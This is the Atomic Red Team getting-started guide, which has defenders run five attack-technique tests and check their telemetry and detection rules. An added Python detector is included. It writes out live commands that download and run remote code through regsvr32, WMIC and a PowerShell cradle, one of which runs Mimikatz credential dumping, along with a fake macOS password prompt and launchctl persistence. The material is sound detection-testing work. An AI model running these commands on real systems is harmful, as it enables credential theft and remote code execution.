Atomic Red Team

Getting Started

1: Run

Start by running some of the most popular tests on Windows and macOS. In most environments, these should be sufficient to generate a useful signal for defenders.

Regsvr32

Run this:

regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll

And you can expect this:

Useful Telemetry:
  • Process monitoring (regsvr32.exe)
  • Network connection (regsvr32.exe establishing a network connection and the presence of a URL)
  • Module load (scrobj.dll)
Detection:

Alert on suspicious regsvr32.exe behavior, such as the network connection and the scrobj.dll module load listed above.

Credential Dumping

Run this:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e'); Invoke-Mimikatz -DumpCr"

And you can expect this:

Useful Telemetry:
  • Process monitoring (powershell.exe)
  • Process command line (“DownloadString”, “WebClient”, and the presence of a URL)
  • Network connection (powershell.exe establishing an external network connection)
Detection:

Alerting based on PowerShell command line and download.

XSL Script Processing

Run this:

wmic.exe process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"

And you can expect this:

Useful Telemetry:
  • Process monitoring (wmic.exe)
  • Process command line (“/FORMAT”, URL on the command line)
  • Network connection (wmic.exe establishing a network connection to remote resource)
Detection:

Alert on suspicious WMIC usage, such as a /FORMAT argument that points at a remote URL.

Input Prompt

Run this:

osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'

And you can expect this:

Useful Telemetry:
  • Process monitoring (osascript)
  • Process command line (command line usage of -e, “password”, “tell app” )
Detection:

Alert on keywords via command line and baseline osascript usage.

Launchctl

Run this:

launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator

And you can expect this:

Useful Telemetry:
  • Process monitoring (launchctl)
Detection:

Baseline usage of launchctl and alert on new (submit) usage.
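As an added example (not part of the Atomic Red Team project or this page), the telemetry and detection notes above turned into a small Python checker run over constructed process-start events; the event shape, the rule names and the example.invalid URLs are assumptions, and the benign look-alike events show where each rule should stay quiet.

```python
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)  # "presence of a URL" on the command line

@dataclass(frozen=True)
class ProcEvent:  # one process-start record, in a hypothetical sensor-neutral shape
    process: str           # image name, e.g. "regsvr32.exe"
    cmdline: str           # full command line
    network: bool = False  # did the process open a network connection?
    modules: tuple = ()    # DLLs the process loaded

def match_rules(ev: ProcEvent) -> list:
    """Return the names of the page's detection rules that this event triggers."""
    proc, cl = ev.process.lower(), ev.cmdline.lower()
    has_url = bool(URL_RE.search(ev.cmdline))
    mods = {m.lower() for m in ev.modules}
    hits = []
    # Regsvr32: network connection, URL on the command line, or scrobj.dll loaded
    if proc == "regsvr32.exe" and (has_url or ev.network or "scrobj.dll" in mods):
        hits.append("regsvr32 remote scriptlet")
    # PowerShell: download-cradle keywords plus a URL or an external connection
    if proc == "powershell.exe" and ("downloadstring" in cl or "webclient" in cl) and (has_url or ev.network):
        hits.append("powershell download")
    # WMIC: /FORMAT pointing at a remote XSL
    if proc == "wmic.exe" and "/format" in cl and has_url:
        hits.append("wmic remote xsl")
    # osascript: -e scripts that drive an app and mention a password
    if proc == "osascript" and "-e" in cl and "tell app" in cl and "password" in cl:
        hits.append("osascript password prompt")
    # launchctl: new job submission (rare once usage is baselined)
    if proc == "launchctl" and " submit " in f" {cl} ":
        hits.append("launchctl submit")
    return hits

def review(events) -> dict:
    """Map each command line that fired a rule to the rules it fired; silent events are omitted."""
    return {ev.cmdline: h for ev in events if (h := match_rules(ev))}

# Constructed sample events: the page's five tests plus benign look-alikes that should stay quiet.
SAMPLE_EVENTS = (
    ProcEvent("regsvr32.exe", "regsvr32.exe /s /u /i:https://example.invalid/RegSvr32.sct scrobj.dll", True, ("scrobj.dll",)),
    ProcEvent("regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\vbscript.dll"),
    ProcEvent("powershell.exe", "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"", True),
    ProcEvent("powershell.exe", "powershell.exe Get-Process"),
    ProcEvent("wmic.exe", 'wmic.exe process list /FORMAT:"https://example.invalid/wmicscript.xsl"'),
    ProcEvent("osascript", "osascript -e 'tell app \"System Preferences\" to display dialog \"type your password\"'"),
    ProcEvent("launchctl", "launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator"),
    ProcEvent("launchctl", "launchctl list"),
)
```

Feeding your own sensor's process events into `match_rules` in the same shape is a quick way to answer the "were your actions visible in logs" question in the review step.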

2: Review

Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:

  • Were any of your actions detected?
  • Were any of your actions blocked or prevented?
  • Were your actions visible in logs or other defensive telemetry?

These are just a few of the questions you can ask. And because test execution is fast, the majority of your time can be spent where it is most valuable: reviewing the results of your tests, improving your understanding of the environment and its controls, and making improvements.

3: Repeat

Once you’ve made any changes or addressed gaps in your detection coverage, repeat the process to ensure coverage, expanding out from these techniques into others that you know to be relevant based on threat intelligence, baselining, or the recommendations of others.